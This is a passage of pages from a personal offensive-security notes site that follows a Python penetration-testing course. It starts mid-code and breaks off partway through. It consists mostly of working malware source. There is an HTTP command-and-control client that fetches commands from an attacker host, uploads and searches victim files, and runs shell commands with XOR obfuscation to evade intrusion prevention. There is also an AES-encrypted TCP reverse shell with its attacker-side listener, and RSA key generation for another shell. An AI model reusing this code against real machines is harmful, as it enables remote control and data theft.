[37](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-37)
[38](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-38)
[39](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-39)
[40](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-40)
[41](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-41)
[42](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-42)
[43](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-43)
[44](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-44)
[45](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-45)
[46](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-46)
[47](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-47)
[48](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-48)
[49](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-49)
[50](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-50)
[51](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-51)
[52](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-52)
[53](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-53)
[54](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-54)
[55](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-55)
[56](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-56)
[57](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-57)
[58](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-58) | `import string import random import requests import os import subprocess import time # Random Key Generator key = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>\|\\') for _ in range(0, 1024)) # Define XOR function def str_xor(s1, s2): return "".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)]) while True: # Send GET request to C&C server to get command req = requests.get('http://192.168.0.152:8080') command = req.text # If command is to terminate, break out of loop if 'terminate' in command: break # If command is to grab a file and send it to the C&C server elif 'grab' in command: grab, path = command.split("*") if os.path.exists(path): url = "http://192.168.0.152:8080/store" filer = {'file': open(path, 'rb')} r = requests.post(url, files=filer) else: post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode()) # If command is to search for files with a specific extension elif 'search' in command: # Split command into path and file extension command = command[7:] #cut off the the first 7 character ,, output would be C:\\*.pdf path, ext = command.split('*') lists = '' # here we define a string where we will append our result on it # Walk through directories and search for files with specified extension for dirpath, dirname, files in os.walk(path): for file in files: if file.endswith(ext): lists = lists + '\n' + os.path.join(dirpath, file) requests.post(url='http://192.168.0.152:8080', data=lists) # If command is a shell command, execute it and send output to the C&C server else: # Encrypt command with XOR key enc = str_xor(command, key) # Execute encrypted command and capture stdout and stderr CMD = subprocess.Popen(enc, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stdout.read(), key)) post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stderr.read(), key)) time.sleep(3)` |
Last update: 2024-03-29
Created: April 10, 2023 16:52:50
Back to top
---
# TCP reverse shell with AES encryption - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#tcp-reverse-shell-with-aes-encryption)
TCP reverse shell with AES encryption
=====================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
Client side
-----------
To be run on the victim's machine.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-22)
[23](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-23)
[24](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-24)
[25](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-25)
[26](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-26)
[27](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-27)
[28](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-28)
[29](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-29)
[30](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-30)
[31](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-31)
[32](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-32)
[33](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-33)
[34](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-0-34) | `from Cryptodome.Cipher import AES from Cryptodome.Util import Padding import socket import subprocess key = b"H" * 32 IV = b"H" * 16 def encrypt(message): encryptor = AES.new(key, AES.MODE_CBC, IV) padded_message = Padding.pad(message, 16) encrypted_message = encryptor.encrypt(padded_message) return encrypted_message def decrypt(cipher): decryptor = AES.new(key, AES.MODE_CBC, IV) decrypted_padded_message = decryptor.decrypt(cipher) decrypted_message = Padding.unpad(decrypted_padded_message, 16) return decrypted_message def connect(): s = socket.socket() s.connect(('192.168.0.152', 8080)) while True: command = decrypt(s.recv(1024)) if 'terminate' in command.decode(): break else: CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE, stdout=subprocess.PIPE) s.send(encrypt(CMD.stdout.read())) def main(): connect() main()` |
Server side
-----------
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-22)
[23](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-23)
[24](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-24)
[25](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-25)
[26](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-26)
[27](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-27)
[28](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-28)
[29](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-29)
[30](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-30)
[31](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-31)
[32](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-32)
[33](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-33)
[34](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-34)
[35](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-35)
[36](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-36)
[37](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-37)
[38](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-38)
[39](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-39)
[40](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-40)
[41](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-41)
[42](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-1-42) | `import socket from Cryptodome.Cipher import AES from Cryptodome.Util import Padding IV = b"H" * 16 # this must match the block size, which is 16 byte key = b"H" * 32 # 32 goes for AES 256 def encrypt(message): encryptor = AES.new(key, AES.MODE_CBC, IV) padded_message = Padding.pad(message, 16) # pad function is to add the necessary extra data to make sure that the size of the padded_message is 16 bytes or a multiple of 16. This is explained because cipher block chaining encryption uses blocks of 16bytes. encrypted_message = encryptor.encrypt(padded_message) return encrypted_message def decrypt(cipher): decryptor = AES.new(key, AES.MODE_CBC, IV) decrypted_padded_message = decryptor.decrypt(cipher) decrypted_message = Padding.unpad(decrypted_padded_message, 16) return decrypted_message def connect(): s = socket.socket() s.bind(('192.168.0.152', 8080)) s.listen(1) conn, address = s.accept() print('[+] We got a connection') while True: command = input("Shell> ") if 'terminate' in command: conn.send(encrypt(b'terminate')) conn.close() break else: command = encrypt(command.encode()) conn.send(command) print(decrypt(conn.recv(1024)).decode()) def main(): connect() main()` |
Test
----
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-22)
[23](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-23)
[24](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/#__codelineno-2-24) | `# Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 from Cryptodome.Cipher import AES from Cryptodome.Util import Padding key = b"H" * 32 #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long. IV = b"H" * 16 cipher = AES.new(key, AES.MODE_CBC, IV) message = "Hello" paddedmessage = Padding.pad(message.encode(), 16) encrypted = cipher.encrypt(paddedmessage) print (encrypted) decipher = AES.new(key, AES.MODE_CBC, IV) paddeddecrypted = decipher.decrypt(encrypted) unpaddedencrypted = Padding.unpad(paddeddecrypted, 16) print(unpaddedencrypted.decode())` |
Last update: 2024-03-29
Created: April 11, 2023 16:43:35
Back to top
---
# TCP reverse shell with RSA encryption - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#tcp-reverse-shell-with-rsa-encryption)
TCP reverse shell with RSA encryption
=====================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
First, we will generate a pair of keys (private and public) on client side (victim's machine) and on server side (attacker machine).
Gen keys
--------
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-0-22) | `# Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 from Cryptodome.PublicKey import RSA new_key = RSA.generate(4096) # generate RSA key that 4096 bits long #Export the Key in PEM format, the PEM extension contains ASCII encoding public_key = new_key.publickey().exportKey("PEM") private_key = new_key.export_key("PEM") public_key_file = open("public.pem", "wb") public_key_file.write(public_key) public_key_file.close() private_key_file = open("private.pem", "wb") private_key_file.write(private_key) private_key_file.close() print(public_key.decode()) print(private_key.decode())` |
RSA client side shell
---------------------
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-1-17)
